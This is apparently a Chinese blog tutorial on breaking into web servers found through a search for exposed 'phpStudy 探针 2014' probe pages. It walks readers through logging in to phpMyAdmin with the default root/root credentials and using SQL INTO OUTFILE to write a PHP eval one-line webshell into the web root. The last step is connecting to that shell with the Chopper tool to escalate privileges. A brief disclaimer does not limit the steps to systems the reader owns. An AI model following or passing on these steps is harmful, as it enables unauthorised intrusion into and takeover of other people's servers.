利用phpStudy 探针 提权网站服务器
2023-09-14 09:01:11 时间
声明:
本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!
-
今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。
-
搜索引擎KeyWord:
phpStudy 探针 2014
-
多往后翻翻。翻个几十页最好。
-
点开搜索到的内容。
点开搜索到的内容。
翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root):
1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin
2、 然后回车即可。
3、 出现以下界面;默认账号密码尝试登陆;
4、 登陆成功后,第一步找到左边导航栏的MYSQL,然后点击上面的SQL,如图
5、 (点击mysql后,右侧表单会增加很多内容,不要理会他,直接点表单上方的SQL按钮即可。)
6、 下面往SQL写入一句话木马,然后用菜刀连接即可!
1、 图片效果不好,贴出代码,自行对比一下子- -
2、 Code:
mysq1
sql 语句
Drop TABLE IF EXISTS 菜刀连接密码;
Create TABLE 自定义一个表名(cmd text NOT NULL);
Insert INTO 自定义一个表名 (cmd) VALUES('<?php @eval($_POST[菜刀连接密码])?>');
Select cmd from 自己编写 into outfile 'D:/WWW/菜刀连接地址.php';['左边绝对地址需要根据网页自行更改']
Drop TABLE IF EXISTS 用户和密码;
- 1
- 2
- 3
- 4
- 5
- 6
- 7
7、 添加完成后,使用菜刀连接;
后面tmp.php是在写入SQL一句话木马那自定义设置的。
成功连上!可自行提权服务器等操作!
相关文章
- 【Mysql 学习】SQL服务器模式
- python多线程扫描爆破网站服务器思路【笔记】
- CentOS安装及配置DNS服务器
- 用SVN钩子实现SVN与WEB测试服务器同步
- 高性能流媒体服务器EasyDSS前端重构(三)- webpack + vue + AdminLTE 多页面引入 element-ui
- 改变服务器sshd 的22的端口
- 巧用linux服务器的/dev/shm/,如果合理使用,可以避开磁盘IO不给力,提高网站访问速度。
- 在连接云服务器的TDengine时,一定要注意这个细微的操作
- 获取数据库服务器日期、时间
- 架设某大型网站服务器全部详细过程(郁闷少年)
- 【经验分享】如何搭建本地MQTT服务器(Windows ),并进行上下行调测
- centos7搭建nfs服务器
- 网站服务器部署配置
- 008-Linux服务器如何查看自己的公网出口IP地址
- python工具方法 29 基于Flask搭建自己的视频服务器网站
- 企业实战LNMP高性能服务器_wordpress、discuz双网站部署
- 让github仓库成为你的网站服务器
- Win2019AD域DNS服务器NSLOOKUP出现 Non-existent domain访问不了某一网站